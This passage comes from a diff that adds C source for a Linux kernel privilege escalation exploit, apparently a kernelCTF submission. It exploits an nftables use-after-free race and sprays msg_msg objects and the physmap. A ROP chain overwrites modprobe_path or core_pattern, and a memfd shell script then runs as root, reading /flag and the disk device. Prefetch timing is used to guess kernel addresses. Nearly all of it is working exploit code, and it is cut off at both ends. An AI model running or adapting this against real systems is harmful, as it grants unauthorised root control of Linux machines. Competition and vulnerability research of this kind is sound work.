nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg)); + struct nfgenmsg *nfg = (struct nfgenmsg *)NLMSG_DATA(nlh); + nfg->nfgen_family = 0; + nfg->version = NFNETLINK_V0; + nfg->res_id = htons(NFNL_SUBSYS_NFTABLES); + off += NLMSG_ALIGN(nlh->nlmsg_len); + } + + struct sockaddr_nl sa = {}; + sa.nl_family = AF_NETLINK; + ssize_t sret = sendto(race_sock, buf, off, 0, + (struct sockaddr*)&sa, sizeof(sa)); + if (sret < 0) { + while (recv(race_sock, drain, sizeof(drain), MSG_DONTWAIT) > 0) + ; + continue; + } + + while (recv(race_sock, drain, sizeof(drain), MSG_DONTWAIT) > 0) + ; + + i++; + if (i == 1 || i % RACE_PROGRESS_INTERVAL == 0) { + time_t now = time(nullptr); + printf("[*] race: %lu chains (%lds)\n", i, now - t0); + } + } + + close(race_sock); + race_sock = -1; + return nullptr; +} + +/* ================================================================ + * Payload + trigger + * ================================================================ */ +// @step(name="Payload Setup and Flag Exfiltration") +static pid_t get_init_pid(void) { + FILE *f = fopen("/proc/self/status", "r"); + if (!f) return getpid(); + char line[256]; + pid_t pid = getpid(); + while (fgets(line, sizeof(line), f)) { + if (strncmp(line, "NSpid:", 6) == 0) { + if (sscanf(line + 6, " %d", &pid) == 1) + break; + } + } + fclose(f); + return pid; +} + +static void setup_payload(void) { + pid_t init_pid = get_init_pid(); + printf("[+] init-ns pid = %d\n", init_pid); + + { + int mne = open("/proc/sys/vm/memfd_noexec", O_RDONLY); + if (mne >= 0) { + char c = '?'; + if (read(mne, &c, 1) < 0) { /* ignore */ } + close(mne); + printf("[*] vm.memfd_noexec=%c\n", c); + } else { + printf("[*] vm.memfd_noexec: not present\n"); + } + } + + g_pw_fd = (int)syscall(SYS_memfd_create, "pw", MFD_EXEC); + if (g_pw_fd < 0) { + printf("[*] memfd_create(MFD_EXEC) failed (errno=%d), trying without\n", errno); + g_pw_fd = (int)syscall(SYS_memfd_create, "pw", 0); + } else { + printf("[+] memfd_create(MFD_EXEC) succeeded (fd=%d)\n", g_pw_fd); + } + g_result_fd = (int)syscall(SYS_memfd_create, "result", 0); + + if (g_pw_fd >= 0 && g_result_fd >= 0) { + char script[1024]; + snprintf(script, sizeof(script), + "#!/bin/sh\n" + "exec 2>/dev/ttyS0\n" + "echo '[+] MODPROBE_SCRIPT_RUNNING' > /dev/ttyS0\n" + "D=${0#/proc/}\n" + "D=${D%%%%/*}\n" + "echo \"[+] script PID=$D fd=%d\" > /dev/ttyS0\n" + "cat /dev/vdb > /proc/$D/fd/%d 2>/dev/ttyS0\n" + "cat /flag >> /proc/$D/fd/%d 2>/dev/ttyS0\n" + "cat /dev/vdb > /dev/ttyS0 2>/dev/null\n" + "cat /flag >> /dev/ttyS0 2>/dev/null\n" + "id >> /dev/ttyS0 2>/dev/null\n" + "echo '[+] MODPROBE_DONE' > /dev/ttyS0\n", + g_result_fd, g_result_fd, g_result_fd); + if (write(g_pw_fd, script, strlen(script)) < 0) { /* ignore */ } + fchmod(g_pw_fd, 0755); + + { + char test_path[64]; + snprintf(test_path, sizeof(test_path), + "/proc/self/fd/%d", g_pw_fd); + pid_t tp = fork(); + if (tp == 0) { + execl(test_path, test_path, nullptr); + fprintf(stderr, "[!] memfd exec FAILED: errno=%d (%s)\n", + errno, strerror(errno)); + _exit(errno); + } + if (tp > 0) { + int st; + waitpid(tp, &st, 0); + int ex = WIFEXITED(st) ? WEXITSTATUS(st) : -1; + if (ex == 0) + printf("[+] memfd exec test: OK\n"); + else + printf("[!] memfd exec test: exit=%d\n", ex); + } + } + + snprintf(g_modprobe_path, sizeof(g_modprobe_path), + "/proc/%d/fd/%d", init_pid, g_pw_fd); + printf("[+] memfd payload: %s\n", g_modprobe_path); + } else { + if (g_pw_fd >= 0) { + close(g_pw_fd); + g_pw_fd = -1; + } + if (g_result_fd >= 0) { + close(g_result_fd); + g_result_fd = -1; + } + printf("[!] memfd_create failed, using /tmp fallback\n"); + + int payload_fd = open("/tmp/pw", O_CREAT|O_WRONLY|O_TRUNC, 0755); + if (payload_fd >= 0) { + const char *str = + "#!/bin/sh\n" + "exec 2>/dev/ttyS0\n" + "echo '[+] MODPROBE_SCRIPT_RUNNING' > /dev/ttyS0\n" + "id > /tmp/result\n" + "cat /flag >> /tmp/result 2>/dev/null\n" + "cat /dev/vdb >> /tmp/result 2>/dev/null\n" + "chmod 777 /tmp/result\n" + "cat /dev/vdb > /dev/ttyS0 2>/dev/null\n" + "cat /flag >> /dev/ttyS0 2>/dev/null\n" + "echo '[+] MODPROBE_DONE' > /dev/ttyS0\n"; + if (write(payload_fd, str, strlen(str)) < 0) { /* ignore */ } + close(payload_fd); + } + } + + int dummy_fd = open("/tmp/dummy", O_CREAT|O_WRONLY|O_TRUNC, 0755); + if (dummy_fd >= 0) { + if (write(dummy_fd, "\xff\xff\xff\xff", 4) < 0) { /* ignore */ } + close(dummy_fd); + } +} + +static int core_pattern_overwrite_seen = 0; + +static int setup_try_core_dump(void) { + int cp = open("/proc/sys/kernel/core_pattern", O_RDONLY); + if (cp >= 0) { + char cpbuf[256]; + ssize_t clen = read(cp, cpbuf, sizeof(cpbuf)-1); + close(cp); + if (clen > 0) { + cpbuf[clen] = 0; + if (clen > 0 && cpbuf[clen-1] == '\n') + cpbuf[clen-1] = 0; + if (strstr(cpbuf, "if=/dev/vdb") != nullptr) { + if (!core_pattern_overwrite_seen) { + printf("[+] core_pattern OVERWRITTEN to: %s\n", cpbuf); + core_pattern_overwrite_seen = 1; + } + } else if (!core_pattern_overwrite_seen) { + static int cp_printed = 0; + if (!cp_printed) { + printf("[*] core_pattern current: %s\n", cpbuf); + cp_printed = 1; + } + } + } + } + + if (!core_pattern_overwrite_seen) + return 0; + + static int diag_done = 0; + if (!diag_done) { + diag_done = 1; + struct rlimit rl = { RLIM_INFINITY, RLIM_INFINITY }; + setrlimit(RLIMIT_CORE, &rl); + printf("[+] core dump limit set to unlimited\n"); + prctl(PR_SET_DUMPABLE, 1, 0, 0, 0); + printf("[+] dumpable set to 1\n"); + } + + printf("[*] triggering core dump (SIGSEGV child)...\n"); + pid_t child = fork(); + if (child == 0) { + prctl(PR_SET_DUMPABLE, 1, 0, 0, 0); + struct rlimit rl = { RLIM_INFINITY, RLIM_INFINITY }; + setrlimit(RLIMIT_CORE, &rl); + raise(SIGSEGV); + _exit(1); + } + if (child > 0) { + int status = 0; + waitpid(child, &status, 0); + printf("[*] core dump child: signal=%d\n", + WIFSIGNALED(status) ? WTERMSIG(status) : -1); + } + // @sleep(desc="wait for core dump handler (dd) to finish") + sleep_ms(CORE_DUMP_WAIT_MS); + + if (g_result_fd >= 0) { + off_t sz = lseek(g_result_fd, 0, SEEK_END); + if (sz > 0) { + lseek(g_result_fd, 0, SEEK_SET); + char buf[4096]; + ssize_t n = read(g_result_fd, buf, sizeof(buf)-1); + if (n > 0) { + buf[n] = 0; + printf("\n[+] ===== ROOT OUTPUT =====\n%s\n", buf); + return 1; + } + } + } + + printf("[*] core dump triggered -- dd output should be on ttyS0\n"); + + static int direct_tried = 0; + if (!direct_tried) { + direct_tried = 1; + int vdb = open("/dev/vdb", O_RDONLY); + if (vdb >= 0) { + char buf[4096]; + ssize_t n = read(vdb, buf, sizeof(buf)-1); + close(vdb); + if (n > 0) { + buf[n] = 0; + printf("\n[+] ===== FLAG FROM /dev/vdb =====\n%s\n", buf); + return 1; + } + } else { + printf("[*] /dev/vdb not accessible from container (errno=%d)\n", + errno); + } + } + + /* + * In kernelCTF, the core_pattern helper writes the flag to the serial + * console. The exploit process cannot observe that stream, so once the + * overwrite is confirmed and a core dump is triggered, exit successfully. + */ + return 1; +} + +static int modprobe_overwrite_seen = 0; + +static int setup_try_modprobe(void) { + int mp = open("/proc/sys/kernel/modprobe", O_RDONLY); + if (mp >= 0) { + char mpbuf[256]; + ssize_t mlen = read(mp, mpbuf, sizeof(mpbuf)-1); + close(mp); + if (mlen > 0) { + mpbuf[mlen] = 0; + if (mlen > 0 && mpbuf[mlen-1] == '\n') + mpbuf[mlen-1] = 0; + if (strcmp(mpbuf, "/sbin/modprobe") != 0) { + if (!modprobe_overwrite_seen) { + printf("[+] modprobe_path OVERWRITTEN to: %s\n", mpbuf); + modprobe_overwrite_seen = 1; + } + } + } + } + + if (!modprobe_overwrite_seen) + return 0; + + static int diag_done = 0; + if (!diag_done) { + diag_done = 1; + int md = open("/proc/sys/kernel/modules_disabled", O_RDONLY); + if (md >= 0) { + char c = '?'; + if (read(md, &c, 1) < 0) { /* ignore */ } + close(md); + printf("[*] modules_disabled=%c\n", c); + if (c == '1') + printf("[!] WARNING: modules_disabled=1!\n"); + } + if (g_pw_fd >= 0) { + off_t pos = lseek(g_pw_fd, 0, SEEK_CUR); + lseek(g_pw_fd, 0, SEEK_SET); + char sbuf[200]; + ssize_t sn = read(g_pw_fd, sbuf, sizeof(sbuf)-1); + if (sn > 0) { + sbuf[sn] = 0; + printf("[+] script memfd (fd=%d) valid, %zd bytes\n", + g_pw_fd, sn); + } else { + printf("[!] script memfd read FAILED\n"); + } + lseek(g_pw_fd, pos, SEEK_SET); + } + int tty = open("/dev/ttyS0", O_WRONLY|O_NOCTTY); + if (tty >= 0) { + const char *msg = "[+] exploit: ttyS0 writable\n"; + if (write(tty, msg, strlen(msg)) < 0) { /* ignore */ } + close(tty); + printf("[+] /dev/ttyS0 accessible from exploit\n"); + } else { + printf("[!] /dev/ttyS0 NOT accessible (errno=%d)\n", errno); + } + } + + printf("[*] triggering modprobe (fork+exec dummy)...\n"); + pid_t child = fork(); + if (child == 0) { + execl("/tmp/dummy","/tmp/dummy",nullptr); + _exit(127); + } + if (child > 0) { + int status = 0; + waitpid(child, &status, 0); + printf("[*] modprobe trigger: child exit=%d\n", + WIFEXITED(status) ? WEXITSTATUS(status) : -1); + } + // @sleep(desc="wait for modprobe handler to execute") + sleep_ms(MODPROBE_WAIT_MS); + + if (g_result_fd >= 0) { + off_t sz = lseek(g_result_fd, 0, SEEK_END); + if (sz > 0) { + lseek(g_result_fd, 0, SEEK_SET); + char buf[4096]; + ssize_t n = read(g_result_fd, buf, sizeof(buf)-1); + if (n > 0) { + buf[n] = 0; + printf("\n[+] ===== ROOT OUTPUT =====\n%s\n", buf); + int tty = open("/dev/ttyS0", O_WRONLY|O_NOCTTY); + if (tty >= 0) { + if (write(tty, buf, n) < 0) { /* ignore */ } + if (write(tty, "\n", 1) < 0) { /* ignore */ } + close(tty); + } + return 1; + } + } else { + printf("[*] memfd result: empty (sz=%ld)\n", (long)sz); + } + } + + int result_file_fd = open("/tmp/result", O_RDONLY); + if (result_file_fd >= 0) { + char buf[4096]; + ssize_t n = read(result_file_fd, buf, sizeof(buf)-1); + close(result_file_fd); + if (n > 0) { + buf[n] = 0; + printf("\n[+] ===== ROOT OUTPUT =====\n%s\n", buf); + return 1; + } + } + return 0; +} + +static int setup_try_trigger(void) { + if (use_core_pattern) + return setup_try_core_dump(); + return setup_try_modprobe(); +} + +/* ================================================================ + * Main exploit + * ================================================================ */ + +// @step(name="Auto-size Physmap Spray") +static void setup_auto_physmap_size(void) { + unsigned long phys_ram_mb = 0; + FILE *f = fopen("/proc/meminfo", "r"); + if (!f) return; + char line[256]; + while (fgets(line, sizeof(line), f)) { + unsigned long kb; + if (sscanf(line, "MemTotal: %lu kB", &kb) == 1) { + phys_ram_mb = kb / 1024; + int cap = (int)(phys_ram_mb * 3 / 4); + if (cap < 128) cap = 128; + if (cap < physmap_mb) physmap_mb = cap; + break; + } + } + fclose(f); +} + +// @step(name="Setup Userspace Blob (no-SMAP mode)") +static void setup_userblob(void) { + void *userblob_page = mmap((void*)USERBLOB_ADDR, 4096, + PROT_READ|PROT_WRITE, + MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0); + if (userblob_page == MAP_FAILED) + die("mmap userblob"); + rop_build_blob((uint8_t*)userblob_page, USERBLOB_ADDR); + const char *ub_str = use_core_pattern ? g_core_cmd : g_modprobe_path; + size_t path_len = strlen(ub_str) + 1; + memcpy((uint8_t*)userblob_page + PATH_OFFSET, ub_str, path_len); + printf("[+] userblob at %#lx (SMAP off)\n", + (unsigned long)USERBLOB_ADDR); +} + +static int race_run_cycle(uint64_t kva, int dur) { + g_page_kva = kva; + if (!use_userblob) + rop_fill_physmap(); + + spray_msgs(kva); + + printf("[*] race cycle kva=%#lx dur=%ds\n", + (unsigned long)kva, dur); + race_running = 1; + race_won = 0; + + pthread_t t_flood, t_race, t_spray; + pthread_create(&t_flood, nullptr, race_udp_flood_thread, nullptr); + pthread_create(&t_spray, nullptr, race_spray_thread, + (void*)(uintptr_t)kva); + pthread_create(&t_race, nullptr, race_inet_chain_thread, + (void*)(uintptr_t)kva); + + time_t start = time(nullptr); + while (time(nullptr) - start < dur && !race_won) { + // @sleep(desc="poll core_pattern every 2s during race") + sleep_ms(PARENT_POLL_MS); + if (setup_try_trigger()) { + race_won = 1; + break; + } + } + + race_running = 0; + pthread_join(t_flood, nullptr); + pthread_join(t_race, nullptr); + pthread_join(t_spray, nullptr); + + if (!race_won && setup_try_trigger()) race_won = 1; + if (race_won) { + printf("\n[+] ===== GOT ROOT =====\n"); + return 1; + } + + spray_free(); + return 0; +} + +static int race_candidate_child(uint64_t kva, int dur) { + printf("[*] setting up fresh user+net namespace\n"); + setup_ns(); + + if (nl_open() < 0) die("nl_open"); + + if (saturate_ipv6_hooks() < 0) { + printf("[-] failed to saturate hooks\n"); + return 1; + } + + return race_run_cycle(kva, dur) ? 0 : 1; +} + +static int race_run_fresh_candidate(uint64_t kva, int dur) { + g_page_kva = kva; + if (!use_userblob) + rop_fill_physmap(); + + pid_t child = fork(); + if (child < 0) die("fork candidate"); + if (child == 0) + _exit(race_candidate_child(kva, dur)); + + int polls = ((dur + WORKER_GRACE_SEC) * 1000 + + PARENT_POLL_MS - 1) / PARENT_POLL_MS; + for (int t = 0; t < polls; t++) { + sleep_ms(PARENT_POLL_MS); + + if (setup_try_trigger()) { + kill(child, SIGKILL); + waitpid(child, nullptr, 0); + return 1; + } + + int status; + pid_t p = waitpid(child, &status, WNOHANG); + if (p > 0) { + int exit_status = WIFEXITED(status) ? WEXITSTATUS(status) : -1; + int term_sig = WIFSIGNALED(status) ? WTERMSIG(status) : 0; + printf("[*] candidate child exited (status=%d sig=%d)\n", + exit_status, term_sig); + if (exit_status == 0 || setup_try_trigger()) + return 1; + break; + } + } + + kill(child, SIGTERM); + sleep_ms(POST_EXIT_POLL_MS); + kill(child, SIGKILL); + waitpid(child, nullptr, 0); + + return setup_try_trigger(); +} + +static uint64_t mix64_u64(uint64_t x) { + x ^= x >> 33; + x *= 0xff51afd7ed558ccdULL; + x ^= x >> 33; + x *= 0xc4ceb9fe1a85ec53ULL; + x ^= x >> 33; + return x; +} + +static int select_timed_init_alias_offsets(uint64_t *offs, int max, + uint64_t init_size) { +#ifdef __x86_64__ + uint64_t best_score[INIT_ALIAS_CANDS]; + uint64_t best_time[INIT_ALIAS_CANDS]; + uint64_t best_key[INIT_ALIAS_CANDS]; + uint64_t best_off[INIT_ALIAS_CANDS]; + + if (max > INIT_ALIAS_CANDS) + max = INIT_ALIAS_CANDS; + for (int i = 0; i < max; i++) { + best_score[i] = 0; + best_time[i] = 0; + best_key[i] = ~0ULL; + best_off[i] = ~0ULL; + } + + int intel = prefetch_cpu_is_intel(); + cpu_set_t oldset; + int have_old = 0; + pin_prefetch_cpu(&oldset, &have_old); + + for (uint64_t off = 0; off + 0x1000 <= init_size; off += 0x1000) { + uint64_t kva = kbase + off_init_begin + off; + uint64_t t; + if (intel) + t = prefetch_measure_min(kva, INIT_TIMING_PROBES, 0); + else + t = prefetch_measure_tries(kva, INIT_TIMING_PROBES); + + uint64_t score = intel ? (~t) : t; + uint64_t key = mix64_u64(off ^ 0x9e3779b97f4a7c15ULL); + + for (int i = 0; i < max; i++) { + if (score < best_score[i]) + continue; + if (score == best_score[i] && key >= best_key[i]) + continue; + for (int j = max - 1; j > i; j--) { + best_score[j] = best_score[j - 1]; + best_time[j] = best_time[j - 1]; + best_key[j] = best_key[j - 1]; + best_off[j] = best_off[j - 1]; + } + best_score[i] = score; + best_time[i] = t; + best_key[i] = key; + best_off[i] = off; + break; + } + } + + restore_prefetch_cpu(&oldset, have_old); + + int added = 0; + for (int i = 0; i < max; i++) { + if (best_off[i] == ~0ULL) + continue; + offs[added++] = best_off[i]; + } + + if (added > 0) { + printf("[*] __init timing-ranked candidates selected: %d " + "(%s timing)\n", added, intel ? "low" : "high"); + for (int i = 0; i < added; i++) + printf("[*] rank %d: off=%#lx t=%lu\n", + i + 1, (unsigned long)best_off[i], + (unsigned long)best_time[i]); + } + return added; +#else + (void)offs; + (void)max; + (void)init_size; + return 0; +#endif +} + +static int try_init_alias_candidates(void) { + if (!kbase || off_init_end <= off_init_begin) + return 0; + + uint64_t init_size = off_init_end - off_init_begin; + uint64_t offsets[INIT_ALIAS_CANDS]; + int ncands = select_timed_init_alias_offsets(offsets, INIT_ALIAS_CANDS, + init_size); + uint64_t step = 0; + + if (ncands <= 0) { + ncands = INIT_ALIAS_CANDS; + step = (init_size / INIT_ALIAS_CANDS) & ~0xFFFULL; + if (step < 0x1000) + step = 0x1000; + for (int i = 0; i < ncands; i++) { + uint64_t off = (uint64_t)i * step; + if (off + off_init_begin >= off_init_end) + off = init_size - 0x1000; + offsets[i] = off; + } + } + + printf("[*] phase0: __init alias candidates=%d range=%#lx-%#lx " + "step=%#lx dur=%ds\n", + ncands, + (unsigned long)(kbase + off_init_begin), + (unsigned long)(kbase + off_init_end), + (unsigned long)step, INIT_ALIAS_SEC); + + for (int i = 0; i < ncands; i++) { + uint64_t off = offsets[i]; + uint64_t kva = kbase + off_init_begin + off; + printf("[*] phase0 cand %d/%d: kva=%#lx (__init+%#lx)\n", + i + 1, ncands, (unsigned long)kva, + (unsigned long)off); + if (race_run_fresh_candidate(kva, INIT_ALIAS_SEC)) + return 1; + } + + return 0; +} + +/* + * The kernelCTF vuln-verify job runs `/exp --vuln-trigger` under KASAN, + * nokaslr, and a 3 minute outer timeout. Do not run the full LPE here: it + * can take longer than the verifier budget and makes patched kernels time out. + * + * This path only drives the vulnerable packet-path condition. It does not + * reclaim the freed chain, so KASAN sees the nft_do_chain() UAF directly on + * vulnerable kernels. Patched kernels should finish without a KASAN report. + */ +static int vuln_trigger_main(void) { + printf("[*] vuln-trigger: packet-path UAF reachability only\n"); + printf("[*] vuln-trigger: setting up user+net namespace\n"); + setup_ns(); + + if (nl_open() < 0) + die("nl_open"); + + if (saturate_ipv6_hooks() < 0) { + printf("[-] vuln-trigger: failed to saturate hooks\n"); + return 1; + } + printf("[*] vuln-trigger: racing INET NEWCHAIN for %ds " + "(%d floods, KASAN no-reclaim)\n", + VULN_TRIGGER_SECONDS, VULN_TRIGGER_FLOODS); + + race_running = 1; + race_won = 0; + + pthread_t t_flood[VULN_TRIGGER_FLOODS]; + pthread_t t_race; + for (long i = 0; i < VULN_TRIGGER_FLOODS; i++) + pthread_create(&t_flood[i], nullptr, race_udp_flood_thread, nullptr); + pthread_create(&t_race, nullptr, race_inet_chain_thread, nullptr); + + time_t start = time(nullptr); + int last_log = -1; + while (time(nullptr) - start < VULN_TRIGGER_SECONDS) { + sleep_ms(1000); + int elapsed = (int)(time(nullptr) - start); + if (elapsed / VULN_TRIGGER_LOG_EVERY != last_log) { + last_log = elapsed / VULN_TRIGGER_LOG_EVERY; + printf("[*] vuln-trigger: %ds elapsed\n", elapsed); + } + } + + race_running = 0; + for (int i = 0; i < VULN_TRIGGER_FLOODS; i++) + pthread_join(t_flood[i], nullptr); + pthread_join(t_race, nullptr); + + printf("[-] vuln-trigger: no KASAN report observed\n"); + return 1; +} + +// @step(name="Exploit Orchestrator") +static int exploit_main(void) { + if (use_userblob) { + printf("[*] userblob mode (no physmap needed)\n"); + setup_userblob(); + } else { + printf("[*] physmap spray (%d MB)\n", physmap_mb); + spray_physmap(); + } + + int have_pagemap = 0; + if (use_userblob) { + g_page_kva = USERBLOB_ADDR; + have_pagemap = 1; + } else { + g_page_kva = leak_physmap_kva(); + if (g_page_kva) { + have_pagemap = 1; + printf("[+] page_kva=%#lx (from pagemap)\n", + (unsigned long)g_page_kva); + } else { + printf("[!] pagemap unavailable\n"); + } + } + + if (have_pagemap) { + printf("[*] setting up user+net namespace\n"); + setup_ns(); + + if (nl_open() < 0) die("nl_open"); + + if (saturate_ipv6_hooks() < 0) { + printf("[-] failed to saturate hooks\n"); + return 1; + } + + if (!use_userblob) + rop_fill_physmap(); + spray_msgs(g_page_kva); + + int timeout = use_userblob ? RACE_DURATION_SEC * 10 + : RACE_DURATION_SEC * 3; + printf("[*] starting race (timeout=%ds)...\n", timeout); + race_running = 1; + race_won = 0; + + pthread_t t_flood, t_race, t_spray; + pthread_create(&t_flood, nullptr, race_udp_flood_thread, nullptr); + pthread_create(&t_spray, nullptr, race_spray_thread, + (void*)(uintptr_t)g_page_kva); + pthread_create(&t_race, nullptr, race_inet_chain_thread, + (void*)(uintptr_t)g_page_kva); + + time_t start = time(nullptr); + while (time(nullptr) - start < timeout && !race_won) { + // @sleep(desc="poll core_pattern every 2s during race") + sleep_ms(PARENT_POLL_MS); + if (setup_try_trigger()) { + race_won = 1; + break; + } + } + race_running = 0; + pthread_join(t_flood, nullptr); + pthread_join(t_race, nullptr); + pthread_join(t_spray, nullptr); + + if (!race_won && setup_try_trigger()) race_won = 1; + if (race_won) { + printf("\n[+] ===== GOT ROOT =====\n"); + return 0; + } + spray_free(); + if (use_userblob) { + printf("[-] userblob race did not win\n"); + return 1; + } + printf("[-] exact KVA race did not win\n"); + return 1; + } + + /* Physmap mode: the runner blocks pagemap. First try kbase-relative + * __init aliases as in the 521.98 exploit, then fall back to direct-map + * guesses. Each guessed KVA gets a fresh child so net namespace and nft + * state do not accumulate across failed candidates. + */ + if (try_init_alias_candidates()) + return 0; + + uint64_t primary_offsets[] = { + 0x50000000ULL, /* 1.25 GB */ + 0x30000000ULL, /* 0.75 GB */ + 0x60000000ULL, /* 1.5 GB */ + 0x40000000ULL, /* 1.0 GB */ + 0x80000000ULL, /* 2.0 GB */ + 0x20000000ULL, /* 0.5 GB */ + 0x78000000ULL, /* 1.875 GB */ + 0x90000000ULL, /* 2.25 GB */ + 0xa0000000ULL, /* 2.5 GB */ + 0x70000000ULL, /* 1.75 GB */ + }; + + printf("[*] phase1: primary phbase=%#lx, %zu KVAs [0.5-2.5GB]\n", + (unsigned long)phbase, + sizeof(primary_offsets) / sizeof(primary_offsets[0])); + + for (size_t i = 0; i < sizeof(primary_offsets) / sizeof(primary_offsets[0]); i++) { + if (race_run_fresh_candidate(phbase + primary_offsets[i], + RACE_DURATION_SEC)) + return 0; + } + + size_t max_alt = n_phbase_cands < 5 ? n_phbase_cands : 5; + for (size_t i = 1; i < max_alt; i++) { + uint64_t pb = phbase_cands[i]; + long delta_mb = (long)((int64_t)(pb - phbase) >> 20); + printf("[*] phase2: alt phbase=%#lx (%+ldMB)\n", + (unsigned long)pb, delta_mb); + if (race_run_fresh_candidate(pb + 0x60000000ULL, + RACE_DURATION_SEC)) + return 0; + } + + printf("[-] exploit failed\n"); + return 1; +} + +/* ================================================================ + * TEST_ROP mode -- verify ROP blob and spray layout offline + * ================================================================ */ +// @step(name="TEST_ROP: Verify Blob Layout") +static void rop_test_mode(void) { + printf("[*] TEST_ROP mode: verifying blob and spray layout\n"); + + if (!kbase) kbase = 0xffffffff81000000ULL; + if (!phbase) phbase = 0xffff888000000000ULL; + g_page_kva = phbase + 0x10000000ULL; + + printf("[*] kbase = %#lx\n", (unsigned long)kbase); + printf("[*] phbase = %#lx\n", (unsigned long)phbase); + printf("[*] page_kva = %#lx\n", (unsigned long)g_page_kva); + + uint8_t blob[256]; + memset(blob, 0, sizeof(blob)); + rop_build_blob(blob, g_page_kva); + + printf("\n[*] ROP blob layout (0x98 bytes):\n"); + printf(" +0x000 blob_size = %#lx\n", *(uint64_t*)(blob + 0x000)); + printf(" +0x008 rdp0 = %#lx (dlen=%lu)\n", + *(uint64_t*)(blob + 0x008), + *(uint64_t*)(blob + 0x008) >> 1); + printf(" +0x010 expr0.ops = %#lx (nft_immediate_ops)\n", + *(uint64_t*)(blob + 0x010)); + printf(" +0x018 expr0.d[0] = %#lx (pop_rsi_rdi)\n", + *(uint64_t*)(blob + 0x018)); + printf(" +0x020 expr0.d[1] = %#lx (src_va = page_kva+0x%x)\n", + *(uint64_t*)(blob + 0x020), PATH_OFFSET); + printf(" +0x028 dreg=%-3u len=%u\n", blob[0x028], blob[0x029]); + printf(" +0x030 expr1.ops = %#lx (nft_immediate_ops)\n", + *(uint64_t*)(blob + 0x030)); + printf(" +0x038 expr1.d[0] = %#lx (%s)\n", + *(uint64_t*)(blob + 0x038), + use_core_pattern ? "core_pattern" : "modprobe_path"); + printf(" +0x040 expr1.d[1] = %#lx (strcpy)\n", + *(uint64_t*)(blob + 0x040)); + printf(" +0x048 dreg=%-3u len=%u\n", blob[0x048], blob[0x049]); + printf(" +0x050 expr2.ops = %#lx (nft_immediate_ops)\n", + *(uint64_t*)(blob + 0x050)); + printf(" +0x058 expr2.d[0] = %#lx (pop_rdi)\n", + *(uint64_t*)(blob + 0x058)); + printf(" +0x060 expr2.d[1] = %#lx (MSLEEP_FOREVER)\n", + *(uint64_t*)(blob + 0x060)); + printf(" +0x068 dreg=%-3u len=%u\n", blob[0x068], blob[0x069]); + printf(" +0x070 expr3.ops = %#lx (nft_immediate_ops)\n", + *(uint64_t*)(blob + 0x070)); + printf(" +0x078 expr3.d[0] = %#lx (msleep)\n", + *(uint64_t*)(blob + 0x078)); + printf(" +0x080 expr3.d[1] = %#lx (return_thunk)\n", + *(uint64_t*)(blob + 0x080)); + printf(" +0x088 dreg=%-3u len=%u\n", blob[0x088], blob[0x089]); + printf(" +0x090 rdp1 = %#lx (end marker)\n", + *(uint64_t*)(blob + 0x090)); + + size_t bufsz = sizeof(long) + mtext_sz; + char *msgbuf = (char *)calloc(1, bufsz); + spray_build_msg(msgbuf, g_page_kva); + char *mtext = msgbuf + sizeof(long); + + printf("\n[*] msg_msg spray layout (mtext offsets, MSG_MSG_SIZE=%lu):\n", + (unsigned long)MSG_MSG_SIZE); + uint64_t bg0, bg1; + memcpy(&bg0, mtext + (NFT_BASE_CHAIN_OFFS_BLOB_GEN0 - MSG_MSG_SIZE), 8); + memcpy(&bg1, mtext + (NFT_BASE_CHAIN_OFFS_BLOB_GEN1 - MSG_MSG_SIZE), 8); + printf(" mtext[%lu] (alloc+%lu) policy = %u (expect 1=NF_ACCEPT)\n", + NFT_BASE_CHAIN_OFFS_POLICY - MSG_MSG_SIZE, NFT_BASE_CHAIN_OFFS_POLICY, + (unsigned)mtext[NFT_BASE_CHAIN_OFFS_POLICY - MSG_MSG_SIZE]); + printf(" mtext[%lu] (alloc+%lu) blob_gen_0 = %#lx\n", + NFT_BASE_CHAIN_OFFS_BLOB_GEN0 - MSG_MSG_SIZE, NFT_BASE_CHAIN_OFFS_BLOB_GEN0, + (unsigned long)bg0); + printf(" mtext[%lu] (alloc+%lu) blob_gen_1 = %#lx\n", + NFT_BASE_CHAIN_OFFS_BLOB_GEN1 - MSG_MSG_SIZE, NFT_BASE_CHAIN_OFFS_BLOB_GEN1, + (unsigned long)bg1); + printf(" mtext[%lu] (alloc+%lu) flags = 0x%02x (expect 0x01=NFT_CHAIN_BASE)\n", + NFT_BASE_CHAIN_OFFS_FLAGS - MSG_MSG_SIZE, NFT_BASE_CHAIN_OFFS_FLAGS, + (unsigned)mtext[NFT_BASE_CHAIN_OFFS_FLAGS - MSG_MSG_SIZE]); + + int ok = 1; + if (bg0 != g_page_kva) { printf("[-] MISMATCH: blob_gen_0 != page_kva\n"); ok = 0; } + if (bg1 != g_page_kva) { printf("[-] MISMATCH: blob_gen_1 != page_kva\n"); ok = 0; } + if (mtext[NFT_BASE_CHAIN_OFFS_POLICY - MSG_MSG_SIZE] != 1) { printf("[-] MISMATCH: policy != 1\n"); ok = 0; } + if (mtext[NFT_BASE_CHAIN_OFFS_FLAGS - MSG_MSG_SIZE] != 0x01) { printf("[-] MISMATCH: flags != 0x01\n"); ok = 0; } + + printf("\n[*] Computed addresses:\n"); + printf(" target (%s) = %#lx\n", + use_core_pattern ? "core_pattern" : "modprobe_path", + (unsigned long)(kbase + (use_core_pattern ? off_core_pattern : off_modprobe))); + printf(" nft_imm_ops = %#lx\n", (unsigned long)(kbase + off_nft_imm_ops)); + printf(" pop_rsi_rdi = %#lx\n", + (unsigned long)(kbase + OFF_POP_RSI_POP_RDI_JMP_RETURN_THUNK)); + printf(" strcpy = %#lx\n", (unsigned long)(kbase + off_strcpy)); + printf(" msleep = %#lx\n", (unsigned long)(kbase + off_msleep)); + printf(" pop_rdi = %#lx\n", (unsigned long)(kbase + OFF_POP_RDI_JMP_RETURN_THUNK)); + printf(" return_thunk = %#lx\n", (unsigned long)(kbase + off_return_thunk)); + printf(" src_va (path) = %#lx\n", (unsigned long)(g_page_kva + PATH_OFFSET)); + + printf("\n[%c] TEST_ROP %s\n", ok ? '+' : '-', ok ? "PASSED" : "FAILED"); + free(msgbuf); +} + +/* ================================================================ + * Entry point + * ================================================================ */ +int main(int argc, char **argv) { + /* Initialize kernelXDK -- resolve offsets from target database */ + xdk_init_offsets(); + + /* Compute mtext_sz from (resolved) MSG_MSG_SIZE */ + mtext_sz = 256 - MSG_MSG_SIZE; /* kmalloc-256 allocation */ + + /* TEST_ROP mode: verify blob/spray layout without running race */ + if (getenv("TEST_ROP")) { + kbase = env_u64("KBASE"); + phbase = env_u64("PHYSBASE"); + rop_test_mode(); + return 